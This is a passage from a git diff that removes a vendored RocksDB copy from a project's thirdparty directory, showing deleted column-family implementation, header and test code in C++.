-  dummy_cfd_->prev_ = dummy_cfd_;
-  dummy_cfd_->next_ = dummy_cfd_;
-}
-
-ColumnFamilySet::~ColumnFamilySet() {
-  while (column_family_data_.size() > 0) {
-    // cfd destructor will delete itself from column_family_data_
-    auto cfd = column_family_data_.begin()->second;
-    cfd->Unref();
-    delete cfd;
-  }
-  dummy_cfd_->Unref();
-  delete dummy_cfd_;
-}
-
-ColumnFamilyData* ColumnFamilySet::GetDefault() const {
-  assert(default_cfd_cache_ != nullptr);
-  return default_cfd_cache_;
-}
-
-ColumnFamilyData* ColumnFamilySet::GetColumnFamily(uint32_t id) const {
-  auto cfd_iter = column_family_data_.find(id);
-  if (cfd_iter != column_family_data_.end()) {
-    return cfd_iter->second;
-  } else {
-    return nullptr;
-  }
-}
-
-ColumnFamilyData* ColumnFamilySet::GetColumnFamily(const std::string& name)
-    const {
-  auto cfd_iter = column_families_.find(name);
-  if (cfd_iter != column_families_.end()) {
-    auto cfd = GetColumnFamily(cfd_iter->second);
-    assert(cfd != nullptr);
-    return cfd;
-  } else {
-    return nullptr;
-  }
-}
-
-uint32_t ColumnFamilySet::GetNextColumnFamilyID() {
-  return ++max_column_family_;
-}
-
-uint32_t ColumnFamilySet::GetMaxColumnFamily() { return max_column_family_; }
-
-void ColumnFamilySet::UpdateMaxColumnFamily(uint32_t new_max_column_family) {
-  max_column_family_ = std::max(new_max_column_family, max_column_family_);
-}
-
-size_t ColumnFamilySet::NumberOfColumnFamilies() const {
-  return column_families_.size();
-}
-
-// under a DB mutex AND write thread
-ColumnFamilyData* ColumnFamilySet::CreateColumnFamily(
-    const std::string& name, uint32_t id, Version* dummy_versions,
-    const ColumnFamilyOptions& options) {
-  assert(column_families_.find(name) == column_families_.end());
-  ColumnFamilyData* new_cfd = new ColumnFamilyData(
-      id, name, dummy_versions, table_cache_, write_buffer_manager_, options,
-      *db_options_, env_options_, this);
-  column_families_.insert({name, id});
-  column_family_data_.insert({id, new_cfd});
-  max_column_family_ = std::max(max_column_family_, id);
-  // add to linked list
-  new_cfd->next_ = dummy_cfd_;
-  auto prev = dummy_cfd_->prev_;
-  new_cfd->prev_ = prev;
-  prev->next_ = new_cfd;
-  dummy_cfd_->prev_ = new_cfd;
-  if (id == 0) {
-    default_cfd_cache_ = new_cfd;
-  }
-  return new_cfd;
-}
-
-// REQUIRES: DB mutex held
-void ColumnFamilySet::FreeDeadColumnFamilies() {
-  autovector<ColumnFamilyData*> to_delete;
-  for (auto cfd = dummy_cfd_->next_; cfd != dummy_cfd_; cfd = cfd->next_) {
-    if (cfd->refs_.load(std::memory_order_relaxed) == 0) {
-      to_delete.push_back(cfd);
-    }
-  }
-  for (auto cfd : to_delete) {
-    // this is very rare, so it's not a problem that we do it under a mutex
-    delete cfd;
-  }
-}
-
-// under a DB mutex AND from a write thread
-void ColumnFamilySet::RemoveColumnFamily(ColumnFamilyData* cfd) {
-  auto cfd_iter = column_family_data_.find(cfd->GetID());
-  assert(cfd_iter != column_family_data_.end());
-  column_family_data_.erase(cfd_iter);
-  column_families_.erase(cfd->GetName());
-}
-
-// under a DB mutex OR from a write thread
-bool ColumnFamilyMemTablesImpl::Seek(uint32_t column_family_id) {
-  if (column_family_id == 0) {
-    // optimization for common case
-    current_ = column_family_set_->GetDefault();
-  } else {
-    current_ = column_family_set_->GetColumnFamily(column_family_id);
-  }
-  handle_.SetCFD(current_);
-  return current_ != nullptr;
-}
-
-uint64_t ColumnFamilyMemTablesImpl::GetLogNumber() const {
-  assert(current_ != nullptr);
-  return current_->GetLogNumber();
-}
-
-MemTable* ColumnFamilyMemTablesImpl::GetMemTable() const {
-  assert(current_ != nullptr);
-  return current_->mem();
-}
-
-ColumnFamilyHandle* ColumnFamilyMemTablesImpl::GetColumnFamilyHandle() {
-  assert(current_ != nullptr);
-  return &handle_;
-}
-
-uint32_t GetColumnFamilyID(ColumnFamilyHandle* column_family) {
-  uint32_t column_family_id = 0;
-  if (column_family != nullptr) {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    column_family_id = cfh->GetID();
-  }
-  return column_family_id;
-}
-
-const Comparator* GetColumnFamilyUserComparator(
-    ColumnFamilyHandle* column_family) {
-  if (column_family != nullptr) {
-    return column_family->GetComparator();
-  }
-  return nullptr;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/column_family.h b/thirdparty/rocksdb/db/column_family.h
deleted file mode 100644
index 3a807d2..0000000
--- a/thirdparty/rocksdb/db/column_family.h
+++ /dev/null
@@ -1,577 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <unordered_map>
-#include <string>
-#include <vector>
-#include <atomic>
-
-#include "db/memtable_list.h"
-#include "db/table_cache.h"
-#include "db/table_properties_collector.h"
-#include "db/write_batch_internal.h"
-#include "db/write_controller.h"
-#include "options/cf_options.h"
-#include "rocksdb/compaction_job_stats.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class Version;
-class VersionSet;
-class MemTable;
-class MemTableListVersion;
-class CompactionPicker;
-class Compaction;
-class InternalKey;
-class InternalStats;
-class ColumnFamilyData;
-class DBImpl;
-class LogBuffer;
-class InstrumentedMutex;
-class InstrumentedMutexLock;
-
-extern const double kIncSlowdownRatio;
-
-// ColumnFamilyHandleImpl is the class that clients use to access different
-// column families. It has non-trivial destructor, which gets called when client
-// is done using the column family
-class ColumnFamilyHandleImpl : public ColumnFamilyHandle {
- public:
-  // create while holding the mutex
-  ColumnFamilyHandleImpl(
-      ColumnFamilyData* cfd, DBImpl* db, InstrumentedMutex* mutex);
-  // destroy without mutex
-  virtual ~ColumnFamilyHandleImpl();
-  virtual ColumnFamilyData* cfd() const { return cfd_; }
-
-  virtual uint32_t GetID() const override;
-  virtual const std::string& GetName() const override;
-  virtual Status GetDescriptor(ColumnFamilyDescriptor* desc) override;
-  virtual const Comparator* GetComparator() const override;
-
- private:
-  ColumnFamilyData* cfd_;
-  DBImpl* db_;
-  InstrumentedMutex* mutex_;
-};
-
-// Does not ref-count ColumnFamilyData
-// We use this dummy ColumnFamilyHandleImpl because sometimes MemTableInserter
-// calls DBImpl methods. When this happens, MemTableInserter need access to
-// ColumnFamilyHandle (same as the client would need). In that case, we feed
-// MemTableInserter dummy ColumnFamilyHandle and enable it to call DBImpl
-// methods
-class ColumnFamilyHandleInternal : public ColumnFamilyHandleImpl {
- public:
-  ColumnFamilyHandleInternal()
-      : ColumnFamilyHandleImpl(nullptr, nullptr, nullptr) {}
-
-  void SetCFD(ColumnFamilyData* _cfd) { internal_cfd_ = _cfd; }
-  virtual ColumnFamilyData* cfd() const override { return internal_cfd_; }
-
- private:
-  ColumnFamilyData* internal_cfd_;
-};
-
-// holds references to memtable, all immutable memtables and version
-struct SuperVersion {
-  // Accessing members of this class is not thread-safe and requires external
-  // synchronization (ie db mutex held or on write thread).
-  MemTable* mem;
-  MemTableListVersion* imm;
-  Version* current;
-  MutableCFOptions mutable_cf_options;
-  // Version number of the current SuperVersion
-  uint64_t version_number;
-
-  InstrumentedMutex* db_mutex;
-
-  // should be called outside the mutex
-  SuperVersion() = default;
-  ~SuperVersion();
-  SuperVersion* Ref();
-  // If Unref() returns true, Cleanup() should be called with mutex held
-  // before deleting this SuperVersion.
-  bool Unref();
-
-  // call these two methods with db mutex held
-  // Cleanup unrefs mem, imm and current. Also, it stores all memtables
-  // that needs to be deleted in to_delete vector. Unrefing those
-  // objects needs to be done in the mutex
-  void Cleanup();
-  void Init(MemTable* new_mem, MemTableListVersion* new_imm,
-            Version* new_current);
-
-  // The value of dummy is not actually used. kSVInUse takes its address as a
-  // mark in the thread local storage to indicate the SuperVersion is in use
-  // by thread. This way, the value of kSVInUse is guaranteed to have no
-  // conflict with SuperVersion object address and portable on different
-  // platform.
-  static int dummy;
-  static void* const kSVInUse;
-  static void* const kSVObsolete;
-
- private:
-  std::atomic<uint32_t> refs;
-  // We need to_delete because during Cleanup(), imm->Unref() returns
-  // all memtables that we need to free through this vector. We then
-  // delete all those memtables outside of mutex, during destruction
-  autovector<MemTable*> to_delete;
-};
-
-extern Status CheckCompressionSupported(const ColumnFamilyOptions& cf_options);
-
-extern Status CheckConcurrentWritesSupported(
-    const ColumnFamilyOptions& cf_options);
-
-extern ColumnFamilyOptions SanitizeOptions(const ImmutableDBOptions& db_options,
-                                           const ColumnFamilyOptions& src);
-// Wrap user defined table proproties collector factories `from cf_options`
-// into internal ones in int_tbl_prop_collector_factories. Add a system internal
-// one too.
-extern void GetIntTblPropCollectorFactory(
-    const ImmutableCFOptions& ioptions,
-    std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories);
-
-class ColumnFamilySet;
-
-// This class keeps all the data that a column family needs.
-// Most methods require DB mutex held, unless otherwise noted
-class ColumnFamilyData {
- public:
-  ~ColumnFamilyData();
-
-  // thread-safe
-  uint32_t GetID() const { return id_; }
-  // thread-safe
-  const std::string& GetName() const { return name_; }
-
-  // Ref() can only be called from a context where the caller can guarantee
-  // that ColumnFamilyData is alive (while holding a non-zero ref already,
-  // holding a DB mutex, or as the leader in a write batch group).
-  void Ref() { refs_.fetch_add(1, std::memory_order_relaxed); }
-
-  // Unref decreases the reference count, but does not handle deletion
-  // when the count goes to 0.  If this method returns true then the
-  // caller should delete the instance immediately, or later, by calling
-  // FreeDeadColumnFamilies().  Unref() can only be called while holding
-  // a DB mutex, or during single-threaded recovery.
-  bool Unref() {
-    int old_refs = refs_.fetch_sub(1, std::memory_order_relaxed);
-    assert(old_refs > 0);
-    return old_refs == 1;
-  }
-
-  // SetDropped() can only be called under following conditions:
-  // 1) Holding a DB mutex,
-  // 2) from single-threaded write thread, AND
-  // 3) from single-threaded VersionSet::LogAndApply()
-  // After dropping column family no other operation on that column family
-  // will be executed. All the files and memory will be, however, kept around
-  // until client drops the column family handle. That way, client can still
-  // access data from dropped column family.
-  // Column family can be dropped and still alive. In that state:
-  // *) Compaction and flush is not executed on the dropped column family.
-  // *) Client can continue reading from column family. Writes will fail unless
-  // WriteOptions::ignore_missing_column_families is true
-  // When the dropped column family is unreferenced, then we:
-  // *) Remove column family from the linked list maintained by ColumnFamilySet
-  // *) delete all memory associated with that column family
-  // *) delete all the files associated with that column family
-  void SetDropped();
-  bool IsDropped() const { return dropped_; }
-
-  // thread-safe
-  int NumberLevels() const { return ioptions_.num_levels; }
-
-  void SetLogNumber(uint64_t log_number) { log_number_ = log_number; }
-  uint64_t GetLogNumber() const { return log_number_; }
-
-  // thread-safe
-  const EnvOptions* soptions() const;
-  const ImmutableCFOptions* ioptions() const { return &ioptions_; }
-  // REQUIRES: DB mutex held
-  // This returns the MutableCFOptions used by current SuperVersion
-  // You should use this API to reference MutableCFOptions most of the time.
-  const MutableCFOptions* GetCurrentMutableCFOptions() const {
-    return &(super_version_->mutable_cf_options);
-  }
-  // REQUIRES: DB mutex held
-  // This returns the latest MutableCFOptions, which may be not in effect yet.
-  const MutableCFOptions* GetLatestMutableCFOptions() const {
-    return &mutable_cf_options_;
-  }
-
-  // REQUIRES: DB mutex held
-  // Build ColumnFamiliesOptions with immutable options and latest mutable
-  // options.
-  ColumnFamilyOptions GetLatestCFOptions() const;
-
-  bool is_delete_range_supported() { return is_delete_range_supported_; }
-
-#ifndef ROCKSDB_LITE
-  // REQUIRES: DB mutex held
-  Status SetOptions(
-      const std::unordered_map<std::string, std::string>& options_map);
-#endif  // ROCKSDB_LITE
-
-  InternalStats* internal_stats() { return internal_stats_.get(); }
-
-  MemTableList* imm() { return &imm_; }
-  MemTable* mem() { return mem_; }
-  Version* current() { return current_; }
-  Version* dummy_versions() { return dummy_versions_; }
-  void SetCurrent(Version* _current);
-  uint64_t GetNumLiveVersions() const;  // REQUIRE: DB mutex held
-  uint64_t GetTotalSstFilesSize() const;  // REQUIRE: DB mutex held
-  void SetMemtable(MemTable* new_mem) { mem_ = new_mem; }
-
-  // calculate the oldest log needed for the durability of this column family
-  uint64_t OldestLogToKeep();
-
-  // See Memtable constructor for explanation of earliest_seq param.
-  MemTable* ConstructNewMemtable(const MutableCFOptions& mutable_cf_options,
-                                 SequenceNumber earliest_seq);
-  void CreateNewMemtable(const MutableCFOptions& mutable_cf_options,
-                         SequenceNumber earliest_seq);
-
-  TableCache* table_cache() const { return table_cache_.get(); }
-
-  // See documentation in compaction_picker.h
-  // REQUIRES: DB mutex held
-  bool NeedsCompaction() const;
-  // REQUIRES: DB mutex held
-  Compaction* PickCompaction(const MutableCFOptions& mutable_options,
-                             LogBuffer* log_buffer);
-
-  // Check if the passed range overlap with any running compactions.
-  // REQUIRES: DB mutex held
-  bool RangeOverlapWithCompaction(const Slice& smallest_user_key,
-                                  const Slice& largest_user_key,
-                                  int level) const;
-
-  // A flag to tell a manual compaction is to compact all levels together
-  // instad of for specific level.
-  static const int kCompactAllLevels;
-  // A flag to tell a manual compaction's output is base level.
-  static const int kCompactToBaseLevel;
-  // REQUIRES: DB mutex held
-  Compaction* CompactRange(const MutableCFOptions& mutable_cf_options,
-                           int input_level, int output_level,
-                           uint32_t output_path_id, const InternalKey* begin,
-                           const InternalKey* end, InternalKey** compaction_end,
-                           bool* manual_conflict);
-
-  CompactionPicker* compaction_picker() { return compaction_picker_.get(); }
-  // thread-safe
-  const Comparator* user_comparator() const {
-    return internal_comparator_.user_comparator();
-  }
-  // thread-safe
-  const InternalKeyComparator& internal_comparator() const {
-    return internal_comparator_;
-  }
-
-  const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-  int_tbl_prop_collector_factories() const {
-    return &int_tbl_prop_collector_factories_;
-  }
-
-  SuperVersion* GetSuperVersion() { return super_version_; }
-  // thread-safe
-  // Return a already referenced SuperVersion to be used safely.
-  SuperVersion* GetReferencedSuperVersion(InstrumentedMutex* db_mutex);
-  // thread-safe
-  // Get SuperVersion stored in thread local storage. If it does not exist,
-  // get a reference from a current SuperVersion.
-  SuperVersion* GetThreadLocalSuperVersion(InstrumentedMutex* db_mutex);
-  // Try to return SuperVersion back to thread local storage. Retrun true on
-  // success and false on failure. It fails when the thread local storage
-  // contains anything other than SuperVersion::kSVInUse flag.
-  bool ReturnThreadLocalSuperVersion(SuperVersion* sv);
-  // thread-safe
-  uint64_t GetSuperVersionNumber() const {
-    return super_version_number_.load();
-  }
-  // will return a pointer to SuperVersion* if previous SuperVersion
-  // if its reference count is zero and needs deletion or nullptr if not
-  // As argument takes a pointer to allocated SuperVersion to enable
-  // the clients to allocate SuperVersion outside of mutex.
-  // IMPORTANT: Only call this from DBImpl::InstallSuperVersion()
-  SuperVersion* InstallSuperVersion(SuperVersion* new_superversion,
-                                    InstrumentedMutex* db_mutex,
-                                    const MutableCFOptions& mutable_cf_options);
-  SuperVersion* InstallSuperVersion(SuperVersion* new_superversion,
-                                    InstrumentedMutex* db_mutex);
-
-  void ResetThreadLocalSuperVersions();
-
-  // Protected by DB mutex
-  void set_pending_flush(bool value) { pending_flush_ = value; }
-  void set_pending_compaction(bool value) { pending_compaction_ = value; }
-  bool pending_flush() { return pending_flush_; }
-  bool pending_compaction() { return pending_compaction_; }
-
-  // Recalculate some small conditions, which are changed only during
-  // compaction, adding new memtable and/or
-  // recalculation of compaction score. These values are used in
-  // DBImpl::MakeRoomForWrite function to decide, if it need to make
-  // a write stall
-  void RecalculateWriteStallConditions(
-      const MutableCFOptions& mutable_cf_options);
-
-  void set_initialized() { initialized_.store(true); }
-
-  bool initialized() const { return initialized_.load(); }
-
- private:
-  friend class ColumnFamilySet;
-  ColumnFamilyData(uint32_t id, const std::string& name,
-                   Version* dummy_versions, Cache* table_cache,
-                   WriteBufferManager* write_buffer_manager,
-                   const ColumnFamilyOptions& options,
-                   const ImmutableDBOptions& db_options,
-                   const EnvOptions& env_options,
-                   ColumnFamilySet* column_family_set);
-
-  uint32_t id_;
-  const std::string name_;
-  Version* dummy_versions_;  // Head of circular doubly-linked list of versions.
-  Version* current_;         // == dummy_versions->prev_
-
-  std::atomic<int> refs_;      // outstanding references to ColumnFamilyData
-  std::atomic<bool> initialized_;
-  bool dropped_;               // true if client dropped it
-
-  const InternalKeyComparator internal_comparator_;
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories_;
-
-  const ColumnFamilyOptions initial_cf_options_;
-  const ImmutableCFOptions ioptions_;
-  MutableCFOptions mutable_cf_options_;
-
-  const bool is_delete_range_supported_;
-
-  std::unique_ptr<TableCache> table_cache_;
-
-  std::unique_ptr<InternalStats> internal_stats_;
-
-  WriteBufferManager* write_buffer_manager_;
-
-  MemTable* mem_;
-  MemTableList imm_;
-  SuperVersion* super_version_;
-
-  // An ordinal representing the current SuperVersion. Updated by
-  // InstallSuperVersion(), i.e. incremented every time super_version_
-  // changes.
-  std::atomic<uint64_t> super_version_number_;
-
-  // Thread's local copy of SuperVersion pointer
-  // This needs to be destructed before mutex_
-  std::unique_ptr<ThreadLocalPtr> local_sv_;
-
-  // pointers for a circular linked list. we use it to support iterations over
-  // all column families that are alive (note: dropped column families can also
-  // be alive as long as client holds a reference)
-  ColumnFamilyData* next_;
-  ColumnFamilyData* prev_;
-
-  // This is the earliest log file number that contains data from this
-  // Column Family. All earlier log files must be ignored and not
-  // recovered from
-  uint64_t log_number_;
-
-  // An object that keeps all the compaction stats
-  // and picks the next compaction
-  std::unique_ptr<CompactionPicker> compaction_picker_;
-
-  ColumnFamilySet* column_family_set_;
-
-  std::unique_ptr<WriteControllerToken> write_controller_token_;
-
-  // If true --> this ColumnFamily is currently present in DBImpl::flush_queue_
-  bool pending_flush_;
-
-  // If true --> this ColumnFamily is currently present in
-  // DBImpl::compaction_queue_
-  bool pending_compaction_;
-
-  uint64_t prev_compaction_needed_bytes_;
-
-  // if the database was opened with 2pc enabled
-  bool allow_2pc_;
-};
-
-// ColumnFamilySet has interesting thread-safety requirements
-// * CreateColumnFamily() or RemoveColumnFamily() -- need to be protected by DB
-// mutex AND executed in the write thread.
-// CreateColumnFamily() should ONLY be called from VersionSet::LogAndApply() AND
-// single-threaded write thread. It is also called during Recovery and in
-// DumpManifest().
-// RemoveColumnFamily() is only called from SetDropped(). DB mutex needs to be
-// held and it needs to be executed from the write thread. SetDropped() also
-// guarantees that it will be called only from single-threaded LogAndApply(),
-// but this condition is not that important.
-// * Iteration -- hold DB mutex, but you can release it in the body of
-// iteration. If you release DB mutex in body, reference the column
-// family before the mutex and unreference after you unlock, since the column
-// family might get dropped when the DB mutex is released
-// * GetDefault() -- thread safe
-// * GetColumnFamily() -- either inside of DB mutex or from a write thread
-// * GetNextColumnFamilyID(), GetMaxColumnFamily(), UpdateMaxColumnFamily(),
-// NumberOfColumnFamilies -- inside of DB mutex
-class ColumnFamilySet {
- public:
-  // ColumnFamilySet supports iteration
-  class iterator {
-   public:
-    explicit iterator(ColumnFamilyData* cfd)
-        : current_(cfd) {}
-    iterator& operator++() {
-      // dropped column families might still be included in this iteration
-      // (we're only removing them when client drops the last reference to the
-      // column family).
-      // dummy is never dead, so this will never be infinite
-      do {
-        current_ = current_->next_;
-      } while (current_->refs_.load(std::memory_order_relaxed) == 0);
-      return *this;
-    }
-    bool operator!=(const iterator& other) {
-      return this->current_ != other.current_;
-    }
-    ColumnFamilyData* operator*() { return current_; }
-
-   private:
-    ColumnFamilyData* current_;
-  };
-
-  ColumnFamilySet(const std::string& dbname,
-                  const ImmutableDBOptions* db_options,
-                  const EnvOptions& env_options, Cache* table_cache,
-                  WriteBufferManager* write_buffer_manager,
-                  WriteController* write_controller);
-  ~ColumnFamilySet();
-
-  ColumnFamilyData* GetDefault() const;
-  // GetColumnFamily() calls return nullptr if column family is not found
-  ColumnFamilyData* GetColumnFamily(uint32_t id) const;
-  ColumnFamilyData* GetColumnFamily(const std::string& name) const;
-  // this call will return the next available column family ID. it guarantees
-  // that there is no column family with id greater than or equal to the
-  // returned value in the current running instance or anytime in RocksDB
-  // instance history.
-  uint32_t GetNextColumnFamilyID();
-  uint32_t GetMaxColumnFamily();
-  void UpdateMaxColumnFamily(uint32_t new_max_column_family);
-  size_t NumberOfColumnFamilies() const;
-
-  ColumnFamilyData* CreateColumnFamily(const std::string& name, uint32_t id,
-                                       Version* dummy_version,
-                                       const ColumnFamilyOptions& options);
-
-  iterator begin() { return iterator(dummy_cfd_->next_); }
-  iterator end() { return iterator(dummy_cfd_); }
-
-  // REQUIRES: DB mutex held
-  // Don't call while iterating over ColumnFamilySet
-  void FreeDeadColumnFamilies();
-
-  Cache* get_table_cache() { return table_cache_; }
-
- private:
-  friend class ColumnFamilyData;
-  // helper function that gets called from cfd destructor
-  // REQUIRES: DB mutex held
-  void RemoveColumnFamily(ColumnFamilyData* cfd);
-
-  // column_families_ and column_family_data_ need to be protected:
-  // * when mutating both conditions have to be satisfied:
-  // 1. DB mutex locked
-  // 2. thread currently in single-threaded write thread
-  // * when reading, at least one condition needs to be satisfied:
-  // 1. DB mutex locked
-  // 2. accessed from a single-threaded write thread
-  std::unordered_map<std::string, uint32_t> column_families_;
-  std::unordered_map<uint32_t, ColumnFamilyData*> column_family_data_;
-
-  uint32_t max_column_family_;
-  ColumnFamilyData* dummy_cfd_;
-  // We don't hold the refcount here, since default column family always exists
-  // We are also not responsible for cleaning up default_cfd_cache_. This is
-  // just a cache that makes common case (accessing default column family)
-  // faster
-  ColumnFamilyData* default_cfd_cache_;
-
-  const std::string db_name_;
-  const ImmutableDBOptions* const db_options_;
-  const EnvOptions env_options_;
-  Cache* table_cache_;
-  WriteBufferManager* write_buffer_manager_;
-  WriteController* write_controller_;
-};
-
-// We use ColumnFamilyMemTablesImpl to provide WriteBatch a way to access
-// memtables of different column families (specified by ID in the write batch)
-class ColumnFamilyMemTablesImpl : public ColumnFamilyMemTables {
- public:
-  explicit ColumnFamilyMemTablesImpl(ColumnFamilySet* column_family_set)
-      : column_family_set_(column_family_set), current_(nullptr) {}
-
-  // Constructs a ColumnFamilyMemTablesImpl equivalent to one constructed
-  // with the arguments used to construct *orig.
-  explicit ColumnFamilyMemTablesImpl(ColumnFamilyMemTablesImpl* orig)
-      : column_family_set_(orig->column_family_set_), current_(nullptr) {}
-
-  // sets current_ to ColumnFamilyData with column_family_id
-  // returns false if column family doesn't exist
-  // REQUIRES: use this function of DBImpl::column_family_memtables_ should be
-  //           under a DB mutex OR from a write thread
-  bool Seek(uint32_t column_family_id) override;
-
-  // Returns log number of the selected column family
-  // REQUIRES: under a DB mutex OR from a write thread
-  uint64_t GetLogNumber() const override;
-
-  // REQUIRES: Seek() called first
-  // REQUIRES: use this function of DBImpl::column_family_memtables_ should be
-  //           under a DB mutex OR from a write thread
-  virtual MemTable* GetMemTable() const override;
-
-  // Returns column family handle for the selected column family
-  // REQUIRES: use this function of DBImpl::column_family_memtables_ should be
-  //           under a DB mutex OR from a write thread
-  virtual ColumnFamilyHandle* GetColumnFamilyHandle() override;
-
-  // Cannot be called while another thread is calling Seek().
-  // REQUIRES: use this function of DBImpl::column_family_memtables_ should be
-  //           under a DB mutex OR from a write thread
-  virtual ColumnFamilyData* current() override { return current_; }
-
- private:
-  ColumnFamilySet* column_family_set_;
-  ColumnFamilyData* current_;
-  ColumnFamilyHandleInternal handle_;
-};
-
-extern uint32_t GetColumnFamilyID(ColumnFamilyHandle* column_family);
-
-extern const Comparator* GetColumnFamilyUserComparator(
-    ColumnFamilyHandle* column_family);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/column_family_test.cc b/thirdparty/rocksdb/db/column_family_test.cc
deleted file mode 100644
index 88786d4..0000000
--- a/thirdparty/rocksdb/db/column_family_test.cc
+++ /dev/null
@@ -1,3244 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <algorithm>
-#include <vector>
-#include <string>
-#include <thread>
-
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "options/options_parser.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "util/coding.h"
-#include "util/fault_injection_test_env.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-static const int kValueSize = 1000;
-
-namespace {
-std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-}  // anonymous namespace
-
-// counts how many operations were performed
-class EnvCounter : public EnvWrapper {
- public:
-  explicit EnvCounter(Env* base)
-      : EnvWrapper(base), num_new_writable_file_(0) {}
-  int GetNumberOfNewWritableFileCalls() {
-    return num_new_writable_file_;
-  }
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& soptions) override {
-    ++num_new_writable_file_;
-    return EnvWrapper::NewWritableFile(f, r, soptions);
-  }
-
- private:
-  std::atomic<int> num_new_writable_file_;
-};
-
-class ColumnFamilyTest : public testing::Test {
- public:
-  ColumnFamilyTest() : rnd_(139) {
-    env_ = new EnvCounter(Env::Default());
-    dbname_ = test::TmpDir() + "/column_family_test";
-    db_options_.create_if_missing = true;
-    db_options_.fail_if_options_file_error = true;
-    db_options_.env = env_;
-    DestroyDB(dbname_, Options(db_options_, column_family_options_));
-  }
-
-  ~ColumnFamilyTest() {
-    Close();
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    Destroy();
-    delete env_;
-  }
-
-  // Return the value to associate with the specified key
-  Slice Value(int k, std::string* storage) {
-    if (k == 0) {
-      // Ugh.  Random seed of 0 used to produce no entropy.  This code
-      // preserves the implementation that was in place when all of the
-      // magic values in this file were picked.
-      *storage = std::string(kValueSize, ' ');
-      return Slice(*storage);
-    } else {
-      Random r(k);
-      return test::RandomString(&r, kValueSize, storage);
-    }
-  }
-
-  void Build(int base, int n, int flush_every = 0) {
-    std::string key_space, value_space;
-    WriteBatch batch;
-
-    for (int i = 0; i < n; i++) {
-      if (flush_every != 0 && i != 0 && i % flush_every == 0) {
-        DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-        dbi->TEST_FlushMemTable();
-      }
-
-      int keyi = base + i;
-      Slice key(DBTestBase::Key(keyi));
-
-      batch.Clear();
-      batch.Put(handles_[0], key, Value(keyi, &value_space));
-      batch.Put(handles_[1], key, Value(keyi, &value_space));
-      batch.Put(handles_[2], key, Value(keyi, &value_space));
-      ASSERT_OK(db_->Write(WriteOptions(), &batch));
-    }
-  }
-
-  void CheckMissed() {
-    uint64_t next_expected = 0;
-    uint64_t missed = 0;
-    int bad_keys = 0;
-    int bad_values = 0;
-    int correct = 0;
-    std::string value_space;
-    for (int cf = 0; cf < 3; cf++) {
-      next_expected = 0;
-      Iterator* iter = db_->NewIterator(ReadOptions(false, true), handles_[cf]);
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-        uint64_t key;
-        Slice in(iter->key());
-        in.remove_prefix(3);
-        if (!ConsumeDecimalNumber(&in, &key) || !in.empty() ||
-            key < next_expected) {
-          bad_keys++;
-          continue;
-        }
-        missed += (key - next_expected);
-        next_expected = key + 1;
-        if (iter->value() != Value(static_cast<int>(key), &value_space)) {
-          bad_values++;
-        } else {
-          correct++;
-        }
-      }
-      delete iter;
-    }
-
-    ASSERT_EQ(0, bad_keys);
-    ASSERT_EQ(0, bad_values);
-    ASSERT_EQ(0, missed);
-    (void)correct;
-  }
-
-  void Close() {
-    for (auto h : handles_) {
-      if (h) {
-        db_->DestroyColumnFamilyHandle(h);
-      }
-    }
-    handles_.clear();
-    names_.clear();
-    delete db_;
-    db_ = nullptr;
-  }
-
-  Status TryOpen(std::vector<std::string> cf,
-                 std::vector<ColumnFamilyOptions> options = {}) {
-    std::vector<ColumnFamilyDescriptor> column_families;
-    names_.clear();
-    for (size_t i = 0; i < cf.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(
-          cf[i], options.size() == 0 ? column_family_options_ : options[i]));
-      names_.push_back(cf[i]);
-    }
-    return DB::Open(db_options_, dbname_, column_families, &handles_, &db_);
-  }
-
-  Status OpenReadOnly(std::vector<std::string> cf,
-                         std::vector<ColumnFamilyOptions> options = {}) {
-    std::vector<ColumnFamilyDescriptor> column_families;
-    names_.clear();
-    for (size_t i = 0; i < cf.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(
-          cf[i], options.size() == 0 ? column_family_options_ : options[i]));
-      names_.push_back(cf[i]);
-    }
-    return DB::OpenForReadOnly(db_options_, dbname_, column_families, &handles_,
-                               &db_);
-  }
-
-#ifndef ROCKSDB_LITE  // ReadOnlyDB is not supported
-  void AssertOpenReadOnly(std::vector<std::string> cf,
-                    std::vector<ColumnFamilyOptions> options = {}) {
-    ASSERT_OK(OpenReadOnly(cf, options));
-  }
-#endif  // !ROCKSDB_LITE
-
-
-  void Open(std::vector<std::string> cf,
-            std::vector<ColumnFamilyOptions> options = {}) {
-    ASSERT_OK(TryOpen(cf, options));
-  }
-
-  void Open() {
